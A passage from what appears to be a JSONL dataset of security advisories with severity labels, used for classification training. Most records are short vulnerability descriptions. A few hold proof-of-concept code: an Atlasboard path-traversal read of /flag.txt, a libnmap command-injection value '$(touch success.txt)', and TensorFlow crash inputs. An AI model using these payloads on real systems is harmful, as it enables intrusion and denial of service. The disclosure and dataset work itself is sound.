Atlasian Atlasboard before version 1.1.9 allows remote attackers to read arbitrary files via a path traversal vulnerability.\n\n### PoC\n```javascript\nconst widget = require(\\\"atlasboard/lib/webapp/routes/widget\\\");\n\n// Mock req and res\nconst req = {};\nconst res = {\n sendFile: (filePath) => {\n // Read and return file contents synchronously\n const data = fs.readFileSync(filePath, \\\"utf8\\\");\n console.log(\\\"Contents of /flag.txt:\\\");\n console.log(data);\n },\n status: function (code) {\n this.statusCode = code;\n return this;\n },\n send: function (msg) {\n throw new Error(`Server responded with status ${this.statusCode}: ${msg}`);\n },\n};\n\n// localPackagesPath set to root to allow traversal to /flag.txt\nconst localPackagesPath = \\\"/\\\";\n\n// resource string with path traversal to escape localPackagesPath and widgets directory\nconst resource = \\\"../../flag.txt\\\";\n\n// Call vulnerable function\nawait widget.renderWidgetResource(localPackagesPath, resource, req, res);\n```", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-02", "split": "train"} -{"id": "a491214c669620dfbbf8", "text": "Multiple Content Injection Vulnerabilities in marked\n\nVersions 0.3.0 and earlier of `marked` are affected by two cross-site scripting vulnerabilities, even when `sanitize: true` is set.\n\nThe attack vectors for this vulnerability are GFM Codeblocks and JavaScript URLs.\n\n## Recommendation\n\nUpgrade to version 0.3.1 or later.", "text_raw": "Multiple Content Injection Vulnerabilities in marked\n\n[Severity: MEDIUM]\n\nVersions 0.3.0 and earlier of `marked` are affected by two cross-site scripting vulnerabilities, even when `sanitize: true` is set.\n\nThe attack vectors for this vulnerability are GFM Codeblocks and JavaScript URLs.\n\n\n## Recommendation\n\nUpgrade to version 0.3.1 or later.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2020-08-31", "split": "train"} -{"id": "3defa34ffde25a5dea5b", "text": "Use of Cryptographically Weak Pseudo-Random Number Generator in yiisoft/yii2-dev\n\nyii2 is vulnerable to Use of Predictable Algorithm in Random Number Generator", "text_raw": "Use of Cryptographically Weak Pseudo-Random Number Generator in yiisoft/yii2-dev\n\n[Severity: MEDIUM]\n\nyii2 is vulnerable to Use of Predictable Algorithm in Random Number Generator", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-09-01", "split": "train"} -{"id": "afcdf231840217081f5e", "text": "Arbitrary code injection in json-sanitizer\n\nOWASP json-sanitizer before 1.2.2 may emit closing SCRIPT tags and CDATA section delimiters for crafted input. This allows an attacker to inject arbitrary HTML or XML into embedding documents.", "text_raw": "Arbitrary code injection in json-sanitizer\n\n[Severity: CRITICAL]\n\nOWASP json-sanitizer before 1.2.2 may emit closing SCRIPT tags and CDATA section delimiters for crafted input. This allows an attacker to inject arbitrary HTML or XML into embedding documents.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-06-16", "split": "train"} -{"id": "be2e42322e55e22cc232", "text": "Remote code execution in mongo-express\n\nmongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.", "text_raw": "Remote code execution in mongo-express\n\n[Severity: CRITICAL]\n\nmongo-express before 1.0.0 offers support for certain advanced syntax but implements this in an unsafe way. NOTE: this may overlap CVE-2019-10769.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-04-13", "split": "train"} -{"id": "73238d6805b4f521fb80", "text": "Improper Authentication in Apache Traffic Control\n\nImproper authentication is possible in Apache Traffic Control versions 3.0.0 and 3.0.1 if LDAP is enabled for login in the Traffic Ops API component. Given a username for a user that can be authenticated via LDAP, it is possible to improperly authenticate as that user without that user's correct password.", "text_raw": "Improper Authentication in Apache Traffic Control\n\n[Severity: CRITICAL]\n\nImproper authentication is possible in Apache Traffic Control versions 3.0.0 and 3.0.1 if LDAP is enabled for login in the Traffic Ops API component. Given a username for a user that can be authenticated via LDAP, it is possible to improperly authenticate as that user without that user's correct password.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-05-18", "split": "train"} -{"id": "366bcc194a6e50efacd4", "text": "Improper Authentication\n\nTraefik 2.x, in certain configurations, allows HTTPS sessions to proceed without mutual TLS verification in a situation where ERR_BAD_SSL_CLIENT_AUTH_CERT should have occurred.", "text_raw": "Improper Authentication\n\n[Severity: HIGH]\n\nTraefik 2.x, in certain configurations, allows HTTPS sessions to proceed without mutual TLS verification in a situation where ERR_BAD_SSL_CLIENT_AUTH_CERT should have occurred.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-09-02", "split": "train"} -{"id": "4f0211b681fe888e0cb6", "text": "Improper implementation of the session fixation protection in Infinispan\n\nA flaw was found in Infinispan through version 9.4.14.Final. An improper implementation of the session fixation protection in the Spring Session integration can result in incorrect session handling.", "text_raw": "Improper implementation of the session fixation protection in Infinispan\n\n[Severity: CRITICAL]\n\nA flaw was found in Infinispan through version 9.4.14.Final. An improper implementation of the session fixation protection in the Spring Session integration can result in incorrect session handling.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-01-21", "split": "train"} -{"id": "4c0282108fae452db64f", "text": "Generation of fake documents via public GET-call\n\n### Impact\nGeneration of fake documents via public GET-call\n\n### Patches\nWe recommend to update to the current version 6.3.5.1. You can get the update to 6.3.5.1 regularly via the Auto-Updater or directly via the download overview.\n\nhttps://www.shopware.com/en/download/#shopware-6\n\n### Workarounds\nFor older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.\n\nhttps://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659\n\n### For more information\nhttps://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021", "text_raw": "Generation of fake documents via public GET-call\n\n[Severity: LOW]\n\n### Impact\nGeneration of fake documents via public GET-call\n\n### Patches\nWe recommend to update to the current version 6.3.5.1. You can get the update to 6.3.5.1 regularly via the Auto-Updater or directly via the download overview.\n\nhttps://www.shopware.com/en/download/#shopware-6\n\n### Workarounds\nFor older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version.\n\nhttps://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659\n\n### For more information\nhttps://docs.shopware.com/en/shopware-6-en/security-updates/security-update-02-2021", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-02-10", "split": "train"} -{"id": "671c1200c2a8d2db5dcd", "text": "Path Traversal in Ansible\n\nAn archive traversal flaw was found in all ansible-engine versions 2.9.x prior to 2.9.7, when running `ansible-galaxy collection` install. When extracting a collection .tar.gz file, the directory is created without sanitizing the filename. An attacker could take advantage to overwrite any file within the system.", "text_raw": "Path Traversal in Ansible\n\n[Severity: MEDIUM]\n\nAn archive traversal flaw was found in all ansible-engine versions 2.9.x prior to 2.9.7, when running `ansible-galaxy collection` install. When extracting a collection .tar.gz file, the directory is created without sanitizing the filename. An attacker could take advantage to overwrite any file within the system.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-04-20", "split": "train"} -{"id": "ec3442141eb2bb6d414b", "text": "In Bouncy Castle JCE Provider it is possible to inject extra elements in the sequence making up the signature and still have it validate\n\nIn Bouncy Castle JCE Provider version 1.55 and earlier the DSA does not fully validate ASN.1 encoding of signature on verification. It is possible to inject extra elements in the sequence making up the signature and still have it validate, which in some cases may allow the introduction of 'invisible' data into a signed structure.", "text_raw": "In Bouncy Castle JCE Provider it is possible to inject extra elements in the sequence making up the signature and still have it validate\n\n[Severity: HIGH]\n\nIn Bouncy Castle JCE Provider version 1.55 and earlier the DSA does not fully validate ASN.1 encoding of signature on verification. It is possible to inject extra elements in the sequence making up the signature and still have it validate, which in some cases may allow the introduction of 'invisible' data into a signed structure.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2018-10-17", "split": "train"} -{"id": "9b69c1bd650f2c411f04", "text": "TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit", "text_raw": "TP-Link TL-WR740N Wireless Router Remote Denial Of Service Exploit\n\nSeverity: low", "severity": "low", "severity_label": 0, "source": "zeroscience", "timestamp": "2013-03-21", "split": "train"} -{"id": "528ad9e230145238f2fa", "text": "EyeLock nano NXT 3.5 Remote Root Exploit", "text_raw": "EyeLock nano NXT 3.5 Remote Root Exploit\n\nSeverity: critical", "severity": "critical", "severity_label": 3, "source": "zeroscience", "timestamp": "2016-08-10", "split": "train"} -{"id": "a87af5503ff5531e8401", "text": "Denial of service attack due to invalid JSON\n\n### Impact\nA denial of service attack against Matrix clients can be exploited by sending an event including invalid JSON data to Synapse. Synapse would relay the data to clients which could crash or hang. Impact is long-lasting if the event is made part of the room state.\n\n### Patches\nAt a minimum #8106 and #8291 must be applied. #7372 and #8124 include additional checks.\n\n### Workarounds\nThere are no known workarounds.\n\n### Upgrading notes\nIf an invalid event is accepted by an earlier Synapse it can become part of the room state and will not be fixed by upgrading Synapse. Redacting the invalid event should avoid clients receiving the invalid event.", "text_raw": "Denial of service attack due to invalid JSON\n\n[Severity: HIGH]\n\n### Impact\nA denial of service attack against Matrix clients can be exploited by sending an event including invalid JSON data to Synapse. Synapse would relay the data to clients which could crash or hang. Impact is long-lasting if the event is made part of the room state.\n\n### Patches\nAt a minimum #8106 and #8291 must be applied. #7372 and #8124 include additional checks.\n\n### Workarounds\nThere are no known workarounds.\n\n### Upgrading notes\nIf an invalid event is accepted by an earlier Synapse it can become part of the room state and will not be fixed by upgrading Synapse. Redacting the invalid event should avoid clients receiving the invalid event.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-11-24", "split": "train"} -{"id": "b283e44a5981cea2b159", "text": "Unsynchronized Access to Shared Data in a Multithreaded Context in RESTEasy\n\nA flaw was found in RESTEasy, where an incorrect response to an HTTP request is provided. This flaw allows an attacker to gain access to privileged information. The highest threat from this vulnerability is to confidentiality and integrity. Versions before resteasy 2.0.0.Alpha3 are affected.", "text_raw": "Unsynchronized Access to Shared Data in a Multithreaded Context in RESTEasy\n\n[Severity: MEDIUM]\n\nA flaw was found in RESTEasy, where an incorrect response to an HTTP request is provided. This flaw allows an attacker to gain access to privileged information. The highest threat from this vulnerability is to confidentiality and integrity. Versions before resteasy 2.0.0.Alpha3 are affected.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-06-08", "split": "train"} -{"id": "8c7f2e198afe7b5bf1e1", "text": "Insecure temporary file used in com.squareup:connect\n\nThis affects all versions of package com.squareup:connect. The method prepareDownloadFilecreates creates a temporary file with the permissions bits of -rw-r--r-- on unix-like systems. On unix-like systems, the system temporary directory is shared between users. As such, the contents of the file downloaded by downloadFileFromResponse will be visible to all other users on the local system. A workaround fix for this issue is to set the system property java.io.tmpdir to a safe directory as remediation. Note: This version of the SDK is end of life and no longer maintained, please upgrade to the latest version.", "text_raw": "Insecure temporary file used in com.squareup:connect\n\n[Severity: LOW]\n\nThis affects all versions of package com.squareup:connect. The method prepareDownloadFilecreates creates a temporary file with the permissions bits of -rw-r--r-- on unix-like systems. On unix-like systems, the system temporary directory is shared between users. As such, the contents of the file downloaded by downloadFileFromResponse will be visible to all other users on the local system. A workaround fix for this issue is to set the system property java.io.tmpdir to a safe directory as remediation. Note: This version of the SDK is end of life and no longer maintained, please upgrade to the latest version.", "severity": "low", "severity_label": 0, "source": "github_advisory", "timestamp": "2021-06-16", "split": "train"} -{"id": "b39eed334351cd8433c7", "text": "Unrestricted Upload of File with Dangerous Type in jquery-file-upload\n\nArbitrary file upload in jQuery Upload File <= 4.0.2", "text_raw": "Unrestricted Upload of File with Dangerous Type in jquery-file-upload\n\n[Severity: CRITICAL]\n\nArbitrary file upload in jQuery Upload File <= 4.0.2", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-12-19", "split": "train"} -{"id": "653bd38bbf311fec674a", "text": "Malicious Package in serilize\n\nThis package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.\n\n## Recommendation\n\nRemove the package from your environment. There are no indications of further compromise.", "text_raw": "Malicious Package in serilize\n\n[Severity: CRITICAL]\n\nThis package contained malicious code. The package uploaded system information such as OS and hostname to a remote server.\n\n\n## Recommendation\n\nRemove the package from your environment. There are no indications of further compromise.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2020-09-03", "split": "train"} -{"id": "2169e778fcb4e64dddbd", "text": "DALIM SOFTWARE ES Core 5.0 build 7184.1 Server-Side Request Forgery", "text_raw": "DALIM SOFTWARE ES Core 5.0 build 7184.1 Server-Side Request Forgery\n\nSeverity: high", "severity": "high", "severity_label": 2, "source": "zeroscience", "timestamp": "2017-08-09", "split": "train"} -{"id": "b028b8ba041f9af10394", "text": "Command Injection in libnmap\n\nVersions of `libnmap` before 0.4.16 are vulnerable to command injection.\n\nProof of concept\n\n```js\nconst nmap = require('libnmap');\nconst opts = {\n range: [\n 'scanme.nmap.org',\n \"x.x.$(touch success.txt)\"\n ]\n};\nnmap.scan(opts, function(err, report) {\n if (err) throw new Error(err);\n\nfor (let item in report) {\n console.log(JSON.stringify(report[item]));\n }\n});\n```\n\n## Recommendation\n\nUpdate to version 0.4.16 or later", "text_raw": "Command Injection in libnmap\n\n[Severity: MEDIUM]\n\nVersions of `libnmap` before 0.4.16 are vulnerable to command injection. \n\nProof of concept\n\n```js\nconst nmap = require('libnmap');\nconst opts = {\n range: [\n 'scanme.nmap.org',\n \"x.x.$(touch success.txt)\"\n ]\n};\nnmap.scan(opts, function(err, report) {\n if (err) throw new Error(err);\n\n for (let item in report) {\n console.log(JSON.stringify(report[item]));\n }\n});\n```\n\n\n## Recommendation\n\nUpdate to version 0.4.16 or later", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2018-11-01", "split": "train"} -{"id": "45dd5da4d8d273bac96e", "text": "Inadequate Encryption Strength in python-keystoneclient\n\npython-keystoneclient version 0.2.3 to 0.2.5 has middleware memcache encryption bypass.", "text_raw": "Inadequate Encryption Strength in python-keystoneclient\n\n[Severity: CRITICAL]\n\npython-keystoneclient version 0.2.3 to 0.2.5 has middleware memcache encryption bypass.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-10-12", "split": "train"} -{"id": "6fc3bb0a947a94e23080", "text": "Prototype Pollution Vulnerability in object-collider\n\nPrototype pollution vulnerability in 'object-collider' versions 1.0.0 through 1.0.3 allows attacker to cause a denial of service and may lead to remote code execution.", "text_raw": "Prototype Pollution Vulnerability in object-collider\n\n[Severity: CRITICAL]\n\nPrototype pollution vulnerability in 'object-collider' versions 1.0.0 through 1.0.3 allows attacker to cause a denial of service and may lead to remote code execution.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-03-19", "split": "train"} -{"id": "ec2c358238a8dafc2b4f", "text": "Pillow Out-of-bounds Read vulnerability\n\nAn issue was discovered in Pillow before 8.2.0. There is an out-of-bounds read in J2kDecode, in j2ku_gray_i. This dates to Pillow 2.4.0.", "text_raw": "Pillow Out-of-bounds Read vulnerability\n\n[Severity: HIGH]\n\nAn issue was discovered in Pillow before 8.2.0. There is an out-of-bounds read in J2kDecode, in j2ku_gray_i. This dates to Pillow 2.4.0.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-06-08", "split": "train"} -{"id": "fd895eaab0f39d544729", "text": "Regular expression denial of service in @absolunet/kafe\n\nThis affects the package @absolunet/kafe before 3.2.10. It allows cause a denial of service when validating crafted invalid emails.", "text_raw": "Regular expression denial of service in @absolunet/kafe\n\n[Severity: MEDIUM]\n\nThis affects the package @absolunet/kafe before 3.2.10. It allows cause a denial of service when validating crafted invalid emails.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-05-10", "split": "train"} -{"id": "81096eee1fd460e4f538", "text": "Reference binding to nullptr in `MatrixSetDiagV*` ops\n\n### Impact\nAn attacker can cause undefined behavior via binding a reference to null pointer in all operations of type `tf.raw_ops.MatrixSetDiagV*`:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.MatrixSetDiagV3(\n input=[1,2,3],\n diagonal=[1,1],\n k=[],\n align='RIGHT_LEFT')\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/linalg/matrix_diag_op.cc) has incomplete validation that the value of `k` is a valid tensor. We have check that this value is either a scalar or a vector, but there is no check for the number of elements. If this is an empty tensor, then code that accesses the first element of the tensor is wrong:\n\n```cc \n auto& diag_index = context->input(1);\n ...\n lower_diag_index = diag_index.flat()(0);\n```\n\n### Patches\nWe have patched the issue in GitHub commit [ff8894044dfae5568ecbf2ed514c1a37dc394f1b](https://github.com/tensorflow/tensorflow/commit/ff8894044dfae5568ecbf2ed514c1a37dc394f1b).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Reference binding to nullptr in `MatrixSetDiagV*` ops\n\n[Severity: MEDIUM]\n\n### Impact\nAn attacker can cause undefined behavior via binding a reference to null pointer in all operations of type `tf.raw_ops.MatrixSetDiagV*`:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.MatrixSetDiagV3(\n input=[1,2,3],\n diagonal=[1,1],\n k=[],\n align='RIGHT_LEFT')\n```\n \nThe [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/linalg/matrix_diag_op.cc) has incomplete validation that the value of `k` is a valid tensor. We have check that this value is either a scalar or a vector, but there is no check for the number of elements. If this is an empty tensor, then code that accesses the first element of the tensor is wrong: \n\n```cc \n auto& diag_index = context->input(1);\n ...\n lower_diag_index = diag_index.flat()(0);\n```\n \n### Patches\nWe have patched the issue in GitHub commit [ff8894044dfae5568ecbf2ed514c1a37dc394f1b](https://github.com/tensorflow/tensorflow/commit/ff8894044dfae5568ecbf2ed514c1a37dc394f1b).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "bec020ef9cb0768e146b", "text": "Unsafe Deserialization in jackson-databind\n\nFasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.", "text_raw": "Unsafe Deserialization in jackson-databind\n\n[Severity: HIGH]\n\nFasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between serialization gadgets and typing, related to `oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS`.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-12-09", "split": "train"} -{"id": "254b55f21e0c1d37e92b", "text": "Cross-site Scripting in LibreNMS\n\nIn LibreNMS < 21.3.0, a stored XSS vulnerability was identified in the API Access page due to insufficient sanitization of the $api->description variable. As a result, arbitrary Javascript code can get executed.", "text_raw": "Cross-site Scripting in LibreNMS\n\n[Severity: MEDIUM]\n\nIn LibreNMS < 21.3.0, a stored XSS vulnerability was identified in the API Access page due to insufficient sanitization of the $api->description variable. As a result, arbitrary Javascript code can get executed.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-09-09", "split": "train"} -{"id": "73c72131e5a7c12aa72a", "text": "Unchecked Return Value in xcb\n\nAn issue was discovered in the xcb crate through 2021-02-04 for Rust. It has a soundness violation because transmutation to the wrong type can happen after xcb::base::cast_event uses std::mem::transmute to return a reference to an arbitrary type.", "text_raw": "Unchecked Return Value in xcb\n\n[Severity: HIGH]\n\nAn issue was discovered in the xcb crate through 2021-02-04 for Rust. It has a soundness violation because transmutation to the wrong type can happen after xcb::base::cast_event uses std::mem::transmute to return a reference to an arbitrary type.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "c3886b657b4107d500d5", "text": "Django-Anymail prone to a timing attack\n\nwebhooks/base.py in Anymail (aka django-anymail) before 1.2.1 is prone to a timing attack vulnerability on the WEBHOOK_AUTHORIZATION secret, which allows remote attackers to post arbitrary e-mail tracking events.", "text_raw": "Django-Anymail prone to a timing attack\n\n[Severity: CRITICAL]\n\nwebhooks/base.py in Anymail (aka django-anymail) before 1.2.1 is prone to a timing attack vulnerability on the WEBHOOK_AUTHORIZATION secret, which allows remote attackers to post arbitrary e-mail tracking events.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2018-07-12", "split": "train"} -{"id": "0579c24a620657389ae4", "text": "Deserialization of Untrusted Data in Spring AMQP\n\nIn Spring AMQP versions 2.2.0 - 2.2.19 and 2.3.0 - 2.3.11, the Spring AMQP Message object, in its toString() method, will create a new String object from the message body, regardless of its size. This can cause an OOM Error with a large message", "text_raw": "Deserialization of Untrusted Data in Spring AMQP\n\n[Severity: MEDIUM]\n\nIn Spring AMQP versions 2.2.0 - 2.2.19 and 2.3.0 - 2.3.11, the Spring AMQP Message object, in its toString() method, will create a new String object from the message body, regardless of its size. This can cause an OOM Error with a large message", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-12-01", "split": "train"} -{"id": "8764d6acbf8be073808e", "text": "Denial of Service in Apache POI\n\nApache POI in versions prior to release 3.17 are vulnerable to Denial of Service Attacks:\n - Infinite Loops while parsing crafted WMF, EMF, MSG and macros (POI bugs 61338 and 61294)\n - Out of Memory Exceptions while parsing crafted DOC, PPT and XLS (POI bugs 52372 and 61295)", "text_raw": "Denial of Service in Apache POI\n\n[Severity: HIGH]\n\nApache POI in versions prior to release 3.17 are vulnerable to Denial of Service Attacks:\n - Infinite Loops while parsing crafted WMF, EMF, MSG and macros (POI bugs 61338 and 61294)\n - Out of Memory Exceptions while parsing crafted DOC, PPT and XLS (POI bugs 52372 and 61295)", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-01-14", "split": "train"} -{"id": "a74be90781b0d3963010", "text": "Yarn Improper link resolution before file access (Link Following)\n\nIn Yarn before 1.21.1, the package install functionality can be abused to generate arbitrary symlinks on the host filesystem by using specially crafted \"bin\" keys. Existing files could be overwritten depending on the current user permission set.", "text_raw": "Yarn Improper link resolution before file access (Link Following)\n\n[Severity: HIGH]\n\nIn Yarn before 1.21.1, the package install functionality can be abused to generate arbitrary symlinks on the host filesystem by using specially crafted \"bin\" keys. Existing files could be overwritten depending on the current user permission set.", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2020-02-14", "split": "train"} -{"id": "eb2784f7bec75cfa8d11", "text": "Moodle vulnerable to RCE via unsafe deserialization\n\nA flaw was found in Moodle in versions 3.11 to 3.11.3, 3.10 to 3.10.7, 3.9 to 3.9.10 and earlier unsupported versions. A remote code execution risk when restoring backup files was identified.", "text_raw": "Moodle vulnerable to RCE via unsafe deserialization\n\n[Severity: CRITICAL]\n\nA flaw was found in Moodle in versions 3.11 to 3.11.3, 3.10 to 3.10.7, 3.9 to 3.9.10 and earlier unsupported versions. A remote code execution risk when restoring backup files was identified.", "severity": "critical", "severity_label": 3, "source": "github_advisory", "timestamp": "2021-11-23", "split": "train"} -{"id": "8fa6eba298fb8853666c", "text": "Double free in algorithmica\n\nAn issue was discovered in the algorithmica crate through 2021-03-07 for Rust. In the affected versions of this crate, `merge_sort::merge()` wildly duplicates and drops ownership of `T` without guarding against double-free. Due to such implementation, simply invoking `merge_sort::merge()` on `Vec` can cause **double free** bugs.", "text_raw": "Double free in algorithmica\n\n[Severity: HIGH]\n\nAn issue was discovered in the algorithmica crate through 2021-03-07 for Rust. In the affected versions of this crate, `merge_sort::merge()` wildly duplicates and drops ownership of `T` without guarding against double-free. Due to such implementation, simply invoking `merge_sort::merge()` on `Vec` can cause **double free** bugs.\n", "severity": "high", "severity_label": 2, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "ebd9ca209b88d8b18ec7", "text": "Reference binding to nullptr in boosted trees\n\n### Impact\nAn attacker can generate undefined behavior via a reference binding to nullptr in `BoostedTreesCalculateBestGainsPerFeature`:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.BoostedTreesCalculateBestGainsPerFeature(\n node_id_range=[],\n stats_summary_list=[[1,2,3]],\n l1=[1.0],\n l2=[1.0],\n tree_complexity =[1.0],\n min_node_weight =[1.17],\n max_splits=5)\n```\n\nA similar attack can occur in `BoostedTreesCalculateBestFeatureSplitV2`:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.BoostedTreesCalculateBestFeatureSplitV2(\n node_id_range=[],\n stats_summaries_list=[[1,2,3]],\n split_types=[''],\n candidate_feature_ids=[1,2,3,4],\n l1=[1], \n l2=[1],\n tree_complexity=[1.0],\n min_node_weight=[1.17],\n logits_dimension=5)\n```\n\nThe [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/boosted_trees/stats_ops.cc) does not validate the input values.\n\n### Patches\nWe have patched the issue in GitHub commit [9c87c32c710d0b5b53dc6fd3bfde4046e1f7a5ad](https://github.com/tensorflow/tensorflow/commit/9c87c32c710d0b5b53dc6fd3bfde4046e1f7a5ad) and in commit. [429f009d2b2c09028647dd4bb7b3f6f414bbaad7](https://github.com/tensorflow/tensorflow/commit/429f009d2b2c09028647dd4bb7b3f6f414bbaad7).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.\n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "text_raw": "Reference binding to nullptr in boosted trees\n\n[Severity: MEDIUM]\n\n### Impact\nAn attacker can generate undefined behavior via a reference binding to nullptr in `BoostedTreesCalculateBestGainsPerFeature`:\n\n```python\nimport tensorflow as tf\n\ntf.raw_ops.BoostedTreesCalculateBestGainsPerFeature(\n node_id_range=[],\n stats_summary_list=[[1,2,3]],\n l1=[1.0],\n l2=[1.0],\n tree_complexity =[1.0],\n min_node_weight =[1.17],\n max_splits=5)\n```\n\nA similar attack can occur in `BoostedTreesCalculateBestFeatureSplitV2`:\n\n```python\nimport tensorflow as tf\n \ntf.raw_ops.BoostedTreesCalculateBestFeatureSplitV2(\n node_id_range=[],\n stats_summaries_list=[[1,2,3]],\n split_types=[''],\n candidate_feature_ids=[1,2,3,4],\n l1=[1], \n l2=[1],\n tree_complexity=[1.0],\n min_node_weight=[1.17],\n logits_dimension=5)\n``` \n \nThe [implementation](https://github.com/tensorflow/tensorflow/blob/84d053187cb80d975ef2b9684d4b61981bca0c41/tensorflow/core/kernels/boosted_trees/stats_ops.cc) does not validate the input values.\n\n### Patches\nWe have patched the issue in GitHub commit [9c87c32c710d0b5b53dc6fd3bfde4046e1f7a5ad](https://github.com/tensorflow/tensorflow/commit/9c87c32c710d0b5b53dc6fd3bfde4046e1f7a5ad) and in commit. [429f009d2b2c09028647dd4bb7b3f6f414bbaad7](https://github.com/tensorflow/tensorflow/commit/429f009d2b2c09028647dd4bb7b3f6f414bbaad7).\n\nThe fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range.\n\n### For more information\nPlease consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. \n\n### Attribution\nThis vulnerability has been reported by members of the Aivul Team from Qihoo 360.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-08-25", "split": "train"} -{"id": "34022053f7e4718ec79d", "text": "Exposure of sensitive information in Elasticsearch\n\nA flaw was discovered in Elasticsearch where document and field level security was not applied to searchable snapshots. This could lead to an authenticated user gaining access to information that they are unauthorized to view.", "text_raw": "Exposure of sensitive information in Elasticsearch\n\n[Severity: MEDIUM]\n\nA flaw was discovered in Elasticsearch where document and field level security was not applied to searchable snapshots. This could lead to an authenticated user gaining access to information that they are unauthorized to view.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2021-09-20", "split": "train"} -{"id": "9467e3e5614b4ffcc47f", "text": "Improper Verification of Cryptographic Signature in keycloak\n\nIt was found that Keycloak's SAML broker, versions up to 6.0.1, did not verify missing message signatures. If an attacker modifies the SAML Response and removes the sections, the message is still accepted, and the message can be modified. An attacker could use this flaw to impersonate other users and gain access to sensitive information.", "text_raw": "Improper Verification of Cryptographic Signature in keycloak\n\n[Severity: MEDIUM]\n\nIt was found that Keycloak's SAML broker, versions up to 6.0.1, did not verify missing message signatures. If an attacker modifies the SAML Response and removes the sections, the message is still accepted, and the message can be modified. An attacker could use this flaw to impersonate other users and gain access to sensitive information.", "severity": "medium", "severity_label": 1, "source": "github_advisory", "timestamp": "2019-09-23", "split": "train"} -{"id": "8b1c951ce276b6f7e662", "text": "Data race in v9\n\nAffected versions of this crate unconditionally implement Sync for SyncRef. This definition allows data races if &T is accessible through &SyncRef.\n\nSyncRef derives Clone and 